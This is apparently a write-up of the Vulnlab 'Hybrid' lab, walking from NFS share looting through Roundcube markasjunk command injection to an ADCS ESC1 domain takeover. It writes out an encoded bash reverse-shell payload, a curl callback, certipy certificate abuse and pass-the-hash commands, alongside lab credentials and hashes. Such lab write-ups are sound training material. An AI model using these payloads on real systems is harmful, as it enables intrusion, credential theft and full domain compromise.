11 KiB
Vulnlab - Hybrid
dc01
NMAP
Nmap scan report for 10.10.177.197
Host is up (1.1s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
3268/tcp open tcpwrapped
3389/tcp open tcpwrapped
|_ssl-date: 2023-07-09T15:21:51+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Issuer: commonName=dc01.hybrid.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T08:29:18
| Not valid after: 2023-12-17T08:29:18
| MD5: 503e6a310914a23a96f899c161496768
|_SHA-1: 8b350872418cb813302ad430acb1b1497acada2e
49669/tcp open tcpwrapped
51915/tcp open tcpwrapped
51928/tcp open tcpwrapped
53128/tcp open tcpwrapped
57220/tcp open tcpwrapped
Host script results:
|_clock-skew: mean: -3s, deviation: 0s, median: -3s
| smb2-time:
| date: 2023-07-09T15:21:28
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
PORT 445 (SMB)
From dc01, we only see smb service running which we can try enumerating with anonymous login which didn't worked
mail01
NMAP
Nmap scan report for 10.10.177.198
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 60bc2226783cb4e06beaaa1ec1625dde (ECDSA)
|_ 256 a3b5d86106e63a418845e35203d2231b (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind
143/tcp open imap Dovecot imapd (Ubuntu)
587/tcp open smtp Postfix smtpd
|_smtp-commands: Couldn't establish connection on port 587
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after: 2033-06-14T13:20:17
| MD5: 38372b812fb16f03436025b4d26bdb29
|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after: 2033-06-14T13:20:17
| MD5: 38372b812fb16f03436025b4d26bdb29
|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008
2049/tcp open rpcbind
33893/tcp open rpcbind
37693/tcp open rpcbind
42661/tcp open rpcbind
46025/tcp open rpcbind
47609/tcp open rpcbind
PORT 80 (HTTP)
mail01 had web server running on port 80 which redirects to mail01.hybrid.vl
Adding the domain in /etc/hosts file
This brings us to Roudcube webmail login portal, trying default credentials like admin:admin it didn't worked
PORT 2049 (NFS)
mail01 had nfs running on port 2049, we can list the share available to mount
showmount -e 10.10.177.198
We can mount this share with the following command
mount -t nfs 10.10.177.198:/opt/share /home/arz/VulnLab/Hybrid/share
From this directory we can find backup.tar.gz
Extracting the archive
From the opt folder we can find a certificate
And from /etc/dovecot we can find the credentials for roundcube mail
Logging in as peter.turner we can see an email sent from admin talking about spam filter
https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/
Foothold
Following an article for remote code execution on markasjunk plugin we can execute commands by changing the email address of a user by using ${IFS} which is a variable in bash that represents a space, tab and a new line character
admin&curl${IFS}10.8.0.136&@hybrid.vl
Now mark any email as junk
We'll get a callback on our listener, so the commands are getting executed
We can get a reverse shell by base64 encoding the payload
bash -i >& /dev/tcp/10.8.0.136/2222 0>&1
admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMTM2LzIyMjIgMD4mMQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl
On doing the same procedure, we'll get a reverse shell as www-data
In /home we only see one user which is a domain user, peter.turner, I tried switching to peter by using his roudcube password but it didn't worked
I tried cracking the password of privkey.pem but it took a long time so I decided to give up on that
Reading /etc/exports file, we can see there's no no_root_squash so we cannot place bash binary owned by root user
We know there's peter.turner on the victim machine with the id 902601108
Before creating the user with the same uid on our machine we meed to allow the creation of uids above 60000 range
Edit the /etc/logins.defs and change the UID_MAX value
Now copying bash binary in the mounted folder
We can see that this binary is owned by peter.turner since we used the same UID and it's a SUID, but on executing it wasn't being executed due to a different GLIBC version, so instead transferring the bash binary from the victim machine and making it a SUID
From peter's home directory, we can find passwords.kdbx file which is a keepassp password safe file
Reading the kdbx file with `kpcli` , it asks for a password
Using peter's roudcube password it worked on this file
From hybrid.vl entry we can get the password of peter
We can use this password to check privileges of peter, which can run anything as root
Being root user we can access /etc/k
Running python-bloodhound to enumerate the trusted.vl domain
python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.132.229
From bloodhound, there wasn't any path from peter leading to domain admin
Enumerating ADCS with certipy for vulnerable certificates
certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.228.165
Members of Authenticated users can enroll and authenticate any user with hybrid-DC01-CA (ESC-1), using old-bloodhound to get the result in json file so we can view it in bloodhound
certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.147.37 -old-bloodhound
https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json
Make sure to add custom queries for ADCS in ~./config/bloodhound/customqueries.json to analyze ADCS in the domain
After putting the custom queries we can see the templates being reflected on bloodhound
Marking hybrid-DC01-CA as the high value target and checking the shortest path to hybrid-DC01-CA
So now we need MAIL01's hash, going back to linux machine as root user, we can extract the NTHash using https://github.com/sosdave/KeyTabExtract from /etc/krb5.keytab
From certipy we didn't found any template names, from bloodhound we can see two templates from which using HYBRIDCOMPUTERS
On requesting the certificate, it was giving an error related to public key requirement
Checking the pem file we have, we can see the size of the public key, which is 4096 bit
Specifying the size of the public key file and requesting the certificate to authenticate as administrator
certipy req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.228.165" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096
Now again with certipy we can request administrator's NTHash
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.228.165
We can get a shell through wmiexec
wmiexec.py administrator@10.10.228.165 -hashes ':60701e8543c9f6db1a2af3217386d3dc'
References
- https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/
- https://github.com/ly4k/Certipy/blob/main/customqueries.json
- https://github.com/sosdave/KeyTabExtract
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
- https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration